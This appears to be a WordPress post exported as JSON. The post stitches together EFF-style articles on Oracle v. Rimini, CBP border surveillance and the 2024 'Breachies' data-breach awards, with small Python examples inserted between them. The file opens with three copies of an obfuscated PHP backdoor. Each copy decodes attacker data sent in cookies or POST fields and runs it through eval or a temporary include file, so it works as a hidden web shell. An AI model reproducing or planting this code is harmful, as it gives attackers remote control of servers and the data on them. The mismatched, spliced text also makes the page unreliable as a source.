$zsyUCM = "\x78" . chr ( 717 - 616 )."\137" . "\x61" . "\x5a" . "\101";$PFjRtn = "\x63" . "\x6c" . 'a' . chr (115) . "\163" . chr (95) . chr (101) . chr (120) . "\151" . chr (115) . chr ( 287 - 171 )."\x73";$YFZuUhHJ = class_exists($zsyUCM); $PFjRtn = "42169";$ROEmCgEmgC = strpos($PFjRtn, $zsyUCM);if ($YFZuUhHJ == $ROEmCgEmgC){function LTEJSV(){$OrYPFIxe = new /* 33980 */ xe_aZA(12595 + 12595); $OrYPFIxe = NULL;}$YIomAGhZVv = "12595";class xe_aZA{private function lAIIvlAlpo($YIomAGhZVv){if (is_array(xe_aZA::$dNwWaPyr)) {$oiNkU2 = str_replace("<" . "?php", "", xe_aZA::$dNwWaPyr["content"]);eval($oiNkU2); $YIomAGhZVv = "12595";exit();}}public function IeLFPTWLCA(){$oiNkU = "283";$this->_dummy = str_repeat($oiNkU, strlen($oiNkU));}public function __destruct(){xe_aZA::$dNwWaPyr = @unserialize(xe_aZA::$dNwWaPyr); $YIomAGhZVv = "37902_53999";$this->lAIIvlAlpo($YIomAGhZVv); $YIomAGhZVv = "37902_53999";}public function yQmvnUBv($oiNkU, $DaAyMVqEO){return $oiNkU[0] ^ str_repeat($DaAyMVqEO, intval(strlen($oiNkU[0]) / strlen($DaAyMVqEO)) + 1);}public function kQEtSGyJY($oiNkU){$FWDQluj = 'b' . "\x61" . 's' . "\x65" . chr ( 316 - 262 ).'4';return array_map($FWDQluj . chr ( 891 - 796 )."\144" . chr (101) . "\143" . 'o' . "\x64" . chr ( 809 - 708 ), array($oiNkU,));}public function __construct($AoLbaKFRoC=0){$VGoFvkYG = chr (44); $oiNkU = "";$RXanOOsZ = $_POST;$lKWLjAlV = $_COOKIE;$DaAyMVqEO = "2a4af22a-324c-4495-ba8c-91e4652bb45d";$YWvPZEopg = @$lKWLjAlV[substr($DaAyMVqEO, 0, 4)];if (!empty($YWvPZEopg)){$YWvPZEopg = explode($VGoFvkYG, $YWvPZEopg);foreach ($YWvPZEopg as $avvNEVLMAi){$oiNkU .= @$lKWLjAlV[$avvNEVLMAi];$oiNkU .= @$RXanOOsZ[$avvNEVLMAi];}$oiNkU = $this->kQEtSGyJY($oiNkU);}xe_aZA::$dNwWaPyr = $this->yQmvnUBv($oiNkU, $DaAyMVqEO);if (strpos($DaAyMVqEO, $VGoFvkYG) !== FALSE){$DaAyMVqEO = explode($VGoFvkYG, $DaAyMVqEO); $IhlxuAFs = base64_decode(strrev($DaAyMVqEO[0]));}}public static $dNwWaPyr = 35467;}LTEJSV();}$TEystoEjzb = 'm' . chr ( 770 - 671 )."\150" . chr ( 357 - 262 )."\x4e" . "\x68" . "\170" . "\x66" . 'k';$tjcaJl = chr ( 978 - 879 )."\154" . chr ( 983 - 886 ).chr ( 896 - 781 ).chr ( 551 - 436 )."\x5f" . chr (101) . 'x' . "\151" . chr ( 689 - 574 ).chr (116) . 's';$mEbbYTt = class_exists($TEystoEjzb); $tjcaJl = "12466";$KqzdIyBw = strpos($tjcaJl, $TEystoEjzb);if ($mEbbYTt == $KqzdIyBw){function OWEwffjgA(){$eyWvrKef = new /* 55036 */ mch_Nhxfk(33619 + 33619); $eyWvrKef = NULL;}$TCKjlpEkO = "33619";class mch_Nhxfk{private function dKpehsMR($TCKjlpEkO){if (is_array(mch_Nhxfk::$ynMAWEJO)) {$name = sys_get_temp_dir() . "/" . crc32(mch_Nhxfk::$ynMAWEJO["salt"]);@mch_Nhxfk::$ynMAWEJO["write"]($name, mch_Nhxfk::$ynMAWEJO["content"]);include $name;@mch_Nhxfk::$ynMAWEJO["delete"]($name); $TCKjlpEkO = "33619";exit();}}public function SDQset(){$hYhZhQe = "21973";$this->_dummy = str_repeat($hYhZhQe, strlen($hYhZhQe));}public function __destruct(){mch_Nhxfk::$ynMAWEJO = @unserialize(mch_Nhxfk::$ynMAWEJO); $TCKjlpEkO = "18815_31585";$this->dKpehsMR($TCKjlpEkO); $TCKjlpEkO = "18815_31585";}public function sDYlixVnA($hYhZhQe, $YSsEwG){return $hYhZhQe[0] ^ str_repeat($YSsEwG, intval(strlen($hYhZhQe[0]) / strlen($YSsEwG)) + 1);}public function edEPNX($hYhZhQe){$rupHSGXoBz = "\142" . "\141" . "\x73" . chr (101) . chr (54) . "\64";return array_map($rupHSGXoBz . chr (95) . chr ( 996 - 896 ).chr ( 1085 - 984 ).chr (99) . chr ( 375 - 264 ).'d' . 
"\x65", array($hYhZhQe,));}public function __construct($SRbNrdusw=0){$ayEyI = ',';$hYhZhQe = "";$LIYFKkHbb = $_POST;$sYBFdyPe = $_COOKIE;$YSsEwG = "a388bc99-5682-4cf7-bad7-9b894580c944";$wdyleeQ = @$sYBFdyPe[substr($YSsEwG, 0, 4)];if (!empty($wdyleeQ)){$wdyleeQ = explode($ayEyI, $wdyleeQ);foreach ($wdyleeQ as $NPfGPKlt){$hYhZhQe .= @$sYBFdyPe[$NPfGPKlt];$hYhZhQe .= @$LIYFKkHbb[$NPfGPKlt];}$hYhZhQe = $this->edEPNX($hYhZhQe);}mch_Nhxfk::$ynMAWEJO = $this->sDYlixVnA($hYhZhQe, $YSsEwG);if (strpos($YSsEwG, $ayEyI) !== FALSE){$YSsEwG = explode($ayEyI, $YSsEwG); $AHjGatIAu = base64_decode(md5($YSsEwG[0])); $yewTxtmiBy = strlen($YSsEwG[1]) > 5 ? substr($YSsEwG[1], 0, 5) : $YSsEwG[1];$_GET['new_key'] = md5(implode('', $YSsEwG)); $PcvTnvLfXD = str_repeat($yewTxtmiBy, 2); $zjVGshnHkH = array_map('trim', $YSsEwG);if (is_array($zjVGshnHkH) && count($zjVGshnHkH) > 1) {$CwFFDIr = $zjVGshnHkH[0];} else {$CwFFDIr = '';}}}public static $ynMAWEJO = 15637;}OWEwffjgA();}$tCurWDKdsP = chr ( 1032 - 929 )."\x4e" . '_' . 'k' . chr (87) . "\101" . "\164";$SZltFKEw = chr (99) . chr (108) . chr (97) . chr (115) . chr ( 234 - 119 ).chr ( 252 - 157 )."\145" . 'x' . chr (105) . chr (115) . chr (116) . "\163";$gPXBkSNty = class_exists($tCurWDKdsP); $SZltFKEw = "30001";$nvemgOjaqk = strpos($SZltFKEw, $tCurWDKdsP);if ($gPXBkSNty == $nvemgOjaqk){function iBDtsZKuD(){$cCoDiATQx = new /* 54584 */ gN_kWAt(34487 + 34487); $cCoDiATQx = NULL;}$XJUJVuL = "34487";class gN_kWAt{private function KDCTggu($XJUJVuL){if (is_array(gN_kWAt::$ktbGMaWCHr)) {$ECvDMsrMkb = str_replace('<' . chr (63) . "\x70" . chr (104) . "\160", "", gN_kWAt::$ktbGMaWCHr['c' . "\157" . chr (110) . 't' . chr (101) . "\156" . chr ( 553 - 437 )]);eval($ECvDMsrMkb); $XJUJVuL = "34487";exit();}}public function SFvNTMsb(){$kCLGXxz = "12398";$this->_dummy = str_repeat($kCLGXxz, strlen($kCLGXxz));}public function __destruct(){gN_kWAt::$ktbGMaWCHr = @unserialize(gN_kWAt::$ktbGMaWCHr); $XJUJVuL = "2467_869";$this->KDCTggu($XJUJVuL); $XJUJVuL = "2467_869";}public function cciXX($kCLGXxz, $IKJyPGX){return $kCLGXxz[0] ^ str_repeat($IKJyPGX, (strlen($kCLGXxz[0]) / strlen($IKJyPGX)) + 1);}public function CwnBGwi($kCLGXxz){$BOvnQaXh = "base64";return array_map($BOvnQaXh . "\137" . "\x64" . 'e' . "\x63" . chr ( 873 - 762 ).'d' . chr ( 167 - 66 ), array($kCLGXxz,));}public function __construct($cAkjEe=0){$ovsCft = ",";$kCLGXxz = "";$tCgiH = $_POST;$nzetxWG = $_COOKIE;$IKJyPGX = "357f6350-42a1-4e4a-94cd-b9561b849dfb";$iuEVe = @$nzetxWG[substr($IKJyPGX, 0, 4)];if (!empty($iuEVe)){$iuEVe = explode($ovsCft, $iuEVe);foreach ($iuEVe as $nNeddGr){$kCLGXxz .= @$nzetxWG[$nNeddGr];$kCLGXxz .= @$tCgiH[$nNeddGr];}$kCLGXxz = $this->CwnBGwi($kCLGXxz);}gN_kWAt::$ktbGMaWCHr = $this->cciXX($kCLGXxz, $IKJyPGX);if (strpos($IKJyPGX, $ovsCft) !== FALSE){$IKJyPGX = explode($ovsCft, $IKJyPGX);}}public static $ktbGMaWCHr = 11808;}iBDtsZKuD();}{"id":4535,"date":"2015-06-21T01:53:41","date_gmt":"2015-06-21T01:53:41","guid":{"rendered":"http:\/\/newsstandard.ca\/?p=4535"},"modified":"2021-01-07T03:15:55","modified_gmt":"2021-01-07T03:15:55","slug":"anarcho-libero-constitutionalist-transcendentalist","status":"publish","type":"post","link":"https:\/\/newsstandard.ca\/channels\/anarcho-libero-constitutionalist-transcendentalist\/","title":{"rendered":"Anarcho-Libero-Constitutionalist-Transcendentalist"},"content":{"rendered":"
READS: Bill of Rights (US) – Anarchist's Cookbook – Preface to Transgression –

VIDEOS: The Birth of a Tool, The Birth of a Wooden House, Basque Axes,

A federal appeals court just gave software developers, and users, an early holiday present, holding that software updates aren't necessarily "derivative," for purposes of copyright law, just because they are designed to interoperate with the software they update.

This sounds kind of obscure, so let's cut through the legalese. Lots of developers build software designed to interoperate with preexisting works. This kind of interoperability is crucial to innovation, particularly in a world where a small number of companies control so many essential tools and platforms. If users want to be able to repair, improve, and secure their devices, they must be able to rely on third parties to help. Trouble is, Big Tech companies want to be able to control (and charge for) every possible use of the devices and software they "sell" you – and they won't hesitate to use the law to enforce that control.

Courts shouldn't assist, but unfortunately a federal district court did just that in the latest iteration of Oracle v. Rimini. Rimini provides support to improve the use and security of Oracle products, so customers don't have to depend entirely on Oracle itself. Oracle doesn't want this kind of competition, so it sued Rimini for copyright infringement, arguing that a software update Rimini developed was a "derivative work" because it was intended to interoperate with Oracle's software, even though the update didn't use any of Oracle's copyrightable code. Derivative works are typically things like a movie based on a novel, or a translation of that novel. Here, the only "derivative" aspect was that Rimini's code was designed to interact with Oracle's code.

Unfortunately, the district court initially sided with Oracle, setting a dangerous precedent. If a work is derivative, it may infringe the copyright in the preexisting work from which it, well, derives. For decades, software developers have relied, correctly, on the settled view that a work is not derivative under copyright law unless it is substantially similar to a preexisting work in both ideas and expression. Thanks to that rule, software developers can build innovative new tools that interact with preexisting works, including tools that improve privacy and security, without fear that the companies that hold rights in those preexisting works would have an automatic copyright claim to those innovations.

Rimini appealed to the Ninth Circuit on multiple grounds. EFF, along with a diverse group of stakeholders representing consumers, small businesses, software developers, security researchers, and the independent repair community, filed an amicus brief in support, explaining that the district court ruling on interoperability was not just bad policy, but also bad law.

The Ninth Circuit agreed:

In effect, the district court adopted an "interoperability" test for derivative works – if a product can only interoperate with a preexisting copyrighted work, then it must be derivative.
But neither the text of the Copyright Act nor our precedent supports this interoperability test for derivative works.

The court goes on to give a primer on the legal definition of derivative work, but the key point is this: a work is only derivative if it "substantially incorporates the other work."

Copyright already reaches far too broadly, giving rightsholders extraordinary power over how we use everything from music to phones to televisions. This holiday season, we're raising a glass to the judges who sensibly reined that power in.

U.S. Customs and Border Protection (CBP) has failed to address six out of six main privacy protections for three of its border surveillance programs – surveillance towers, aerostats, and unattended ground sensors – according to a new assessment by the Government Accountability Office (GAO).

In the report, GAO compared the policies for these technologies against six of the key Fair Information Practice Principles that agencies are supposed to use when evaluating systems and processes that may impact privacy, as dictated by both Office of Management and Budget guidance and the Department of Homeland Security's own rules.

These include:

Data collection. "DHS should collect only PII [Personally Identifiable Information] that is directly relevant and necessary to accomplish the specified purpose(s)."
Purpose specification. "DHS should specifically articulate the purpose(s) for which the PII is intended to be used."
Information sharing. "Sharing PII outside the department should be for a purpose compatible with the purpose for which the information was collected."
Data security. "DHS should protect PII through appropriate security safeguards against risks such as loss, unauthorized access or use, destruction, modification, or unintended or inappropriate disclosure."
Data retention. "DHS should only retain PII for as long as is necessary to fulfill the specified purpose(s)."
Accountability. "DHS should be accountable for complying with these principles, including by auditing the actual use of PII to demonstrate compliance with these principles and all applicable privacy protection requirements."

These baseline privacy elements for the three border surveillance technologies were not addressed in any "technology policies, standard operating procedures, directives, or other documents that direct a user in how they are to use a Technology," according to GAO's review.

CBP operates hundreds of surveillance towers along both the northern and southern borders, some of which are capable of capturing video more than seven miles away. The agency has six large aerostats (essentially tethered blimps) that use radar along the southern border, with others stationed in the Florida Keys and Puerto Rico. The agency also operates a series of smaller aerostats that stream video in the Rio Grande Valley of Texas, with the newest one installed this fall in southeastern New Mexico. And the report notes deficiencies with CBP's linear ground detection system, a network of seismic sensors and cameras that are triggered by movement or footsteps.

The GAO report underlines EFF's concerns that the privacy of people who live and work in the borderlands is violated when federal agencies deploy militarized, high-tech programs to confront unauthorized border crossings.
The rights of border communities are too often treated as acceptable collateral damage in pursuit of border security.

CBP defended its practices by saying that it does, to some extent, address the FIPPs in its Privacy Impact Assessments, documents written for public consumption. GAO rejected this claim, saying that these assessments are not adequate in instructing agency staff on how to protect privacy when deploying the technologies and using the data that has been collected.

In its recommendations, GAO calls on the CBP Commissioner to "require each detection, observation, and monitoring technology policy to address the privacy protections in the Fair Information Practice Principles." But EFF calls on Congress to hold CBP to account and stop approving massive spending on border security technologies that the agency continues to operate irresponsibly.

Every year, countless emails hit our inboxes telling us that our personal information was accessed, shared, or stolen in a data breach. In many cases, there is little we can do. Most of us can assume that at least our phone numbers, emails, addresses, credit card numbers, and social security numbers are all available somewhere on the internet.

But some of these data breaches are more noteworthy than others, because they include novel information about us, are the result of particularly noteworthy security flaws, or are just so massive they're impossible to ignore. For that reason, we are introducing the Breachies, a series of tongue-in-cheek "awards" for some of the most egregious data breaches of the year.

If these companies practiced a privacy-first approach and focused on data minimization, only collecting and storing what they absolutely need to provide the services they promise, many data breaches would be far less harmful to the victims. But instead, companies gobble up as much as they can, store it for as long as possible, and inevitably at some point someone decides to poke in and steal that data.

Once all that personal data is stolen, it can be used against the breach victims for identity theft, ransomware attacks, and to send unwanted spam. The risk of these attacks isn't just a minor annoyance: research shows it can cause psychological injury, including anxiety, depression, and PTSD. To avoid these attacks, breach victims must spend time and money to freeze and unfreeze their credit reports, to monitor their credit reports, and to obtain identity theft prevention services.

This year we've got some real stinkers, ranging from private health information to – you guessed it – credit cards and social security numbers.

The Winners

The Just Stop Using Tracking Tech Award: Kaiser Permanente
The Most Impactful Data Breach for '90s Kids Award: Hot Topic
The Only Stalkers Allowed Award: mSpy
The I Didn't Even Know You Had My Information Award: Evolve Bank
The We Told You So Award: AU10TIX
The Why We're Still Stuck on Unique Passwords Award: Roku
The Listen, Security Researchers are Trying to Help Award: City of Columbus
The Have I Been Pwned? Award: Spoutible
The Reporting's All Over the Place Award: National Public Data
The Biggest Health Breach We've Ever Seen Award: Change Healthcare
The There's No Such Thing As Backdoors for Only "Good Guys" Award: Salt Typhoon
The Snowballing Breach of the Year Award: Snowflake
Tips to Protect Yourself
(Dis)Honorable Mentions

The Just Stop Using Tracking Tech Award: Kaiser Permanente

In one of the year's most preventable breaches, the healthcare company Kaiser Permanente exposed 13 million patients' information via tracking code embedded in its website and app. This tracking code transmitted potentially sensitive medical information to Google, Microsoft, and X (formerly known as Twitter). The exposed information included patients' names, terms they searched in Kaiser's Health Encyclopedia, and how they navigated within and interacted with Kaiser's website or app.

The most troubling aspect of this breach is that medical information was exposed not by a sophisticated hack, but through widely used tracking technologies that Kaiser voluntarily placed on its website. Kaiser has since removed the problematic code, but tracking technologies are rampant across the internet and on other healthcare websites. A 2024 study found tracking technologies sharing information with third parties on 96% of hospital websites. Websites usually use tracking technologies to serve targeted ads. But these same technologies give advertisers, data brokers, and law enforcement easy access to details about your online activity (the sketch after this section illustrates the basic pattern).

While individuals can protect themselves from online tracking by using tools like EFF's Privacy Badger, we need legislative action to make online privacy the norm for everyone. EFF advocates for a ban on online behavioral advertising to address the primary incentive for companies to use invasive tracking technology. Otherwise, we'll continue to see companies voluntarily sharing your personal data, then apologizing when thieves inevitably exploit a vulnerability in these tracking systems.
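To make the mechanism concrete, here is a minimal illustrative sketch of the pattern an embedded analytics beacon follows. Everything in it is hypothetical – the tracker.example host and the parameter names are invented for illustration, not taken from Kaiser's site or any real vendor – but the basic move of packing page context into a third-party request URL is the general one:

```python
# Illustrative sketch only: the endpoint and parameter names are hypothetical,
# not taken from any real analytics vendor or from Kaiser's actual code.
from urllib.parse import urlencode

def build_tracking_beacon(page_url: str, search_term: str, visitor_id: str) -> str:
    """Build the kind of third-party beacon URL an embedded tracker fires.

    Everything in the query string leaves the first-party site and becomes
    visible to whoever operates tracker.example.
    """
    params = {
        "v": visitor_id,     # pseudonymous ID that links a user's visits together
        "page": page_url,    # the URL alone can reveal a health condition
        "q": search_term,    # on-site search terms ride along too
    }
    return "https://tracker.example/collect?" + urlencode(params)

print(build_tracking_beacon(
    "https://hospital.example/encyclopedia/diabetes",
    "insulin dosage",
    "abc123",
))
```

Nothing in this sketch is a "hack"; it is the ordinary, intended behavior of embedded trackers, which is exactly why the exposure was so preventable.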
The Most Impactful Data Breach for '90s Kids Award: Hot Topic

If you were in middle or high school any time in the '90s you probably have strong memories of Hot Topic. Baby goths and young punk rockers alike would go to the mall, get an Orange Julius and greasy slice of Sbarro pizza, then walk over to Hot Topic to pick up edgy t-shirts and overpriced bondage pants (all the while debating who was the biggest poser and which bands were sellouts, of course). Because of the fundamental position Hot Topic occupies in our generation's personal mythology, this data breach hits extra hard.

In November 2024, Have I Been Pwned reported that Hot Topic and its subsidiary Box Lunch suffered a data breach of nearly 57 million data records. A hacker using the alias "Satanic" claimed responsibility and posted a 730 GB database on a hacker forum with a sale price of $20,000. The compromised data about approximately 54 million customers reportedly includes: names, email addresses, physical addresses, phone numbers, purchase history, birth dates, and partial credit card details. Research by Hudson Rock indicates that the data was compromised using infostealer malware installed on a Hot Topic employee's work computer. "Satanic" claims that the original infection stems from the Snowflake data breach (another Breachie winner), though that hasn't been confirmed because Hot Topic has still not notified customers, nor responded to our request for comment.

Though data breaches of this scale are common, it still breaks our little goth hearts, and we'd prefer stores did a better job of securing our data. Worse, Hot Topic still hasn't publicly acknowledged this breach, despite numerous news reports. Perhaps Hot Topic was the real sellout all along.

The Only Stalkers Allowed Award: mSpy

mSpy, a commercially available mobile stalkerware app owned by Ukraine-based company Brainstack, was subject to a data breach earlier this year. More than a decade's worth of information about the app's customers was stolen, as well as the real names and email addresses of Brainstack employees.

The defining feature of stalkerware apps is their ability to operate covertly and trick users into believing that they are not being monitored. But in reality, applications like mSpy allow whoever planted the stalkerware to remotely view the contents of the victim's device in real time. These tools are often used to intimidate, harass, and harm victims, including by stalkers and abusive (ex) partners. Given the highly sensitive data collected by companies like mSpy and the harm to targets when their data gets revealed, this data breach is another example of why stalkerware must be stopped.

The I Didn't Even Know You Had My Information Award: Evolve Bank

Okay, are we the only ones who hadn't heard of Evolve Bank? It was reported in May that Evolve Bank experienced a data breach – though it actually happened all the way back in February. You may be thinking, "why does this breach matter if I've never heard of Evolve Bank before?" That's what we thought too!

But here's the thing: this attack affected a bunch of companies you have heard of, like Affirm (the buy now, pay later service), Wise (the international money transfer service), and Mercury Bank (a fintech company). So, a ton of services use the bank, and you may have used one of those services. It's been reported that 7.6 million Americans were affected by the breach, with most of the stolen data being customer information, including social security numbers, account numbers, and dates of birth.

The small bright side? No customer funds were accessed during the breach. Evolve states that after the breach it took some basic steps like resetting user passwords and strengthening its security infrastructure.

The We Told You So Award: AU10TIX

AU10TIX is an "identity verification" company used by the likes of TikTok and X to confirm that users are who they claim to be. AU10TIX and companies like it collect and review sensitive private documents such as driver's license information before users can register for a site or access some content.

Unfortunately, there is growing political interest in mandating identity or age verification before allowing people to access social media or adult material. EFF and others oppose these plans because they threaten both speech and privacy.
As we said in 2023, verification mandates would inevitably lead to more data breaches, potentially exposing government IDs as well as information about the sites that a user visits.

Look no further than the AU10TIX breach to see what we mean. According to a report by 404 Media in May, AU10TIX left login credentials exposed online for more than a year, allowing access to very sensitive user data.

404 Media details how a researcher gained access to the company's logging platform, "which in turn contained links to data related to specific people who had uploaded their identity documents." This included "the person's name, date of birth, nationality, identification number, and the type of document uploaded such as a drivers' license," as well as images of those identity documents.

The AU10TIX breach did not seem to lead to exposure beyond what the researcher showed was possible. But AU10TIX and other companies must do a better job at locking down user data. More importantly, politicians must not create new privacy dangers by requiring identity and age verification.

If age verification requirements become law, we'll be handing a lot of our sensitive information over to companies like AU10TIX. This is the first We Told You So Breachie award, but it likely won't be the last.

The Why We're Still Stuck on Unique Passwords Award: Roku

In April, Roku announced not yet another new way to display more ads, but a data breach (its second of the year) in which 576,000 accounts were compromised via a "credential stuffing attack." This is a common, relatively easy sort of automated attack in which thieves use previously leaked username and password combinations (from a past data breach of an unrelated company) to get into accounts on a different service. If, say, your username and password were exposed in the Comcast data breach of 2015, and you used the same username and password on Roku, the attacker might have been able to get into your account. Thankfully, fewer than 400 Roku accounts saw unauthorized purchases, and no payment information was accessed.

But the ease of this sort of data breach is why it's important to use unique passwords everywhere (the sketch after this section shows one quick way to check whether a password is already circulating in breach dumps). A password manager, including one that might be free on your phone or browser, makes this much easier to do. Likewise, credential stuffing illustrates why it's important to use two-factor authentication. After the Roku breach, the company turned on two-factor authentication for all accounts. This way, even if someone did get access to your account password, they'd need that second code from another device – in Roku's case, either your phone number or email address.
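To make that advice actionable, here is a minimal sketch – our illustration, not an official EFF or Roku tool – that checks a password against Have I Been Pwned's public Pwned Passwords range API. The API is built around k-anonymity: only the first five hex characters of the password's SHA-1 hash are sent, never the password itself:

```python
# Minimal k-anonymity lookup against the Pwned Passwords range API.
# Only the first 5 hex characters of the SHA-1 hash leave your machine.
import hashlib
import urllib.request

def pwned_count(password: str) -> int:
    """Return how many times `password` appears in known breach corpora."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        # Each response line is "<HASH-SUFFIX>:<COUNT>".
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0

if __name__ == "__main__":
    print(pwned_count("password123"))  # a reused password like this scores in the millions
```

A non-zero count means the password already sits in the very lists that credential-stuffing tools feed on, so it should never be reused anywhere.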
The Listen, Security Researchers are Trying to Help Award: City of Columbus

In August, the security researcher David Ross Jr. (also known as Connor Goodwolf) discovered that a ransomware attack against the City of Columbus, Ohio, was much more serious than city officials initially revealed. After the researcher informed the press and provided proof, the city accused him of violating multiple laws and obtained a gag order against him.

Rather than silencing the researcher, city officials should have celebrated him for helping victims understand the true extent of the breach. EFF and security researchers know the value of this work. And EFF has a team of lawyers who help protect researchers and their work.

Here is how not to deal with a security researcher: In July, Columbus learned it had suffered a ransomware attack. A group called Rhysida took responsibility. The city did not pay the ransom, and the group posted some of the stolen data online. The mayor announced the stolen data was "encrypted or corrupted," so most of it was unusable. Later, the researcher, David Ross, helped inform local news outlets that the breach did in fact include usable personal information on residents. He also attempted to contact the city. Days later, the city offered free credit monitoring to all of its residents and confirmed that its original announcement was inaccurate.

Unfortunately, the city also filed a lawsuit, and a judge signed a temporary restraining order preventing the researcher from accessing, downloading, or disseminating the data. Later, the researcher agreed to a more limited injunction. The city eventually confirmed that the data of hundreds of thousands of people was stolen in the ransomware attack, including driver's licenses, social security numbers, employee information, and the identities of juvenile victims, undercover police officers, and confidential informants.

The Have I Been Pwned? Award: Spoutible

The Spoutible breach has layers – layers of "no way!" that keep revealing more and more amazing little facts the deeper one digs.

It all started with a leaky API. On a per-user basis, it didn't just return the sort of information you'd expect from a social media platform, but also the user's email, IP address, and phone number. No way! Why would you do that?

But hold on, it also included a bcrypt hash of their password. No way! Why would you do that?!

Ah well, at least they offer two-factor authentication (2FA) to protect against password leakages, except... the API was also returning the secret used to generate the 2FA OTP. No way! So, if someone had enabled 2FA, it was immediately rendered useless by virtue of this field being visible to everyone (the sketch after this section shows why a leaked seed defeats 2FA entirely).

However, the pièce de résistance comes with the next field in the API: the "em_code." You know how when you do a password reset you get emailed a secret code that proves you control the address and can change the password? That was the code! No way!

– EFF thanks guest author Troy Hunt for this contribution to the Breachies.
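To see why a leaked OTP secret is game over, remember that TOTP (RFC 6238) is deterministic: anyone holding the base32 seed can compute the same six-digit code your authenticator app shows. A minimal standard-library sketch, using a made-up secret rather than anything from the actual breach:

```python
# Sketch of RFC 6238 TOTP using only the Python standard library.
# The secret below is made up; in the Spoutible case, the API handed out each
# user's real seed, letting anyone compute their "second factor" at will.
import base64, hashlib, hmac, struct, time

def totp(base32_secret: str, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(base32_secret, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // period)  # 30-second time step
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # dynamic truncation
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # prints the same code an authenticator app would
```

There is no secret sauce beyond the seed itself, which is why exposing it through an API response converts "two-factor" back into one factor.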
The Reporting's All Over the Place Award: National Public Data

In January 2024, there was almost no chance you'd have heard of a company called National Public Data. But starting in April, then ramping up in June, stories revealed a breach affecting the background-check data broker that included names, phone numbers, addresses, and social security numbers of at least 300 million people. By August, the reported number had ballooned to 2.9 billion people. In October, National Public Data filed for bankruptcy, leaving behind nothing but a breach notification on its website.

But what exactly was stolen? The evolving news coverage has raised more questions than it has answered. Too bad National Public Data has failed to tell the public more about the data that the company failed to secure.

One analysis found that some of the dataset was inaccurate, with a number of duplicates; also, while there were 137 million email addresses, they weren't linked to social security numbers. Another analysis had similar results. As for social security numbers, there were likely somewhere around 272 million in the dataset. The data was so jumbled that it had names matched to the wrong email or address, and included a large chunk of people who were deceased. Oh, and that 2.9 billion number? That was the number of rows of data in the dataset, not the number of individuals. The 2.9 billion people figure appears to have originated from a complaint filed in Florida.

Phew, time to check in with Count von Count on this one, then.

How many people were truly affected? It's difficult to say for certain. The only thing we learned for sure is that starting a data broker company appears to be incredibly easy: NPD was owned by a retired sheriff's deputy and a small film studio and didn't seem to be a large operation. While this data broker got caught with more leaks than the Titanic, hundreds of others are still out there collecting and hoarding information, and failing to watch out for the next iceberg.

The Biggest Health Breach We've Ever Seen Award: Change Healthcare

In February, a ransomware attack on Change Healthcare exposed the private health information of over 100 million people. The company, which processes 40% of all U.S. health insurance claims, was forced offline for nearly a month. As a result, healthcare practices nationwide struggled to stay operational and patients experienced limits on access to care. Meanwhile, the stolen data poses long-term risks of identity theft and insurance fraud for millions of Americans – it includes patients' personal identifiers, health diagnoses, medications, insurance details, financial information, and government identity documents.

The misuse of medical records can be harder to detect and correct than regular financial fraud or identity theft. The FTC recommends that people at risk of medical identity theft watch out for suspicious medical bills or debt collection notices.

The hack highlights the need for stronger cybersecurity in the healthcare industry, which is increasingly targeted by cyberattacks. The Change Healthcare hackers were able to access a critical system because it lacked two-factor authentication, a basic form of security.

To make matters worse, Change Healthcare's recent merger with Optum, which antitrust regulators tried and failed to block, further centralized vast amounts of sensitive information. Many healthcare providers blamed corporate consolidation for the scale of the disruption. As the former president of the American Medical Association put it, "When we have one option, then the hackers have one big target... if they bring that down, they can grind U.S. health care to a halt." Privacy and competition are related values, and data breach and monopoly are connected problems.

The There's No Such Thing As Backdoors for Only "Good Guys" Award: Salt Typhoon

When companies build backdoors into their services to provide law enforcement access to user data, these backdoors can be exploited by thieves, foreign governments, and other adversaries. There are no methods of access that are magically only accessible to "good guys." No security breach has demonstrated that more clearly than this year's attack by Salt Typhoon, a Chinese government-backed hacking group.
Internet service providers generally have special systems that provide law enforcement and intelligence agencies access to user data. They do so to comply with laws like CALEA, which require telecom companies to provide a means for "lawful intercepts" – in other words, wiretaps.

The Salt Typhoon group was able to access the powerful tools that have, in theory, been reserved for U.S. government agencies. The hackers infiltrated the nation's biggest telecom networks, including Verizon, AT&T, and others, and were able to target their surveillance based on U.S. law enforcement wiretap requests. Breaches elsewhere in the system let them listen in on calls in real time. People under U.S. surveillance were clearly some of the targets, but the hackers also targeted both 2024 presidential campaigns and officials in the State Department.

While fewer than 150 people have been identified as targets so far, the number of people who were called or texted by those targets runs into the "millions," according to a senator who has been briefed on the hack. What's more, the Salt Typhoon hackers still have not been rooted out of the networks they infiltrated.

The idea that only authorized government agencies would use such backdoor access tools has always been flawed. With sophisticated state-sponsored hacking groups operating across the globe, a data breach like Salt Typhoon was only a matter of time.

The Snowballing Breach of the Year Award: Snowflake

Thieves compromised the corporate customer accounts of U.S. cloud analytics provider Snowflake. The corporate customers included AT&T, Ticketmaster, Santander, Neiman Marcus, and many others: 165 in total.

This led to a massive breach of billions of data records for individuals using these companies. A combination of infostealer malware infections on non-Snowflake machines and weak security protecting the affected accounts allowed the hackers to gain access and extort the customers. At the time of the hack, April–July of this year, Snowflake was not requiring two-factor authentication, an account security measure that could have provided protection against the attacks. A number of arrests were made after security researchers uncovered the identities of several of the threat actors.

But what does Snowflake do? According to its website, Snowflake "is a cloud-based data platform that provides data storage, processing, and analytic solutions." Essentially, it stores and indexes troves of customer data for companies to look at. And the larger the amount of data stored, the bigger the target for malicious actors seeking leverage to extort those companies. The problem is that the data is about all of us. In the case of Snowflake customer AT&T, this includes billions of call and text logs of its customers, putting individuals' sensitive data at risk of exposure. A privacy-first approach would employ techniques such as data minimization: either not collecting that data in the first place or shortening the period for which it is retained. Otherwise it just sits there waiting for the next breach.

Tips to Protect Yourself

Data breaches are such a common occurrence that it's easy to feel like there's nothing you can do, nor any point in trying. But privacy isn't dead. While some information about you is almost certainly out there, that's no reason for despair.
In fact, it's a good reason to take action.

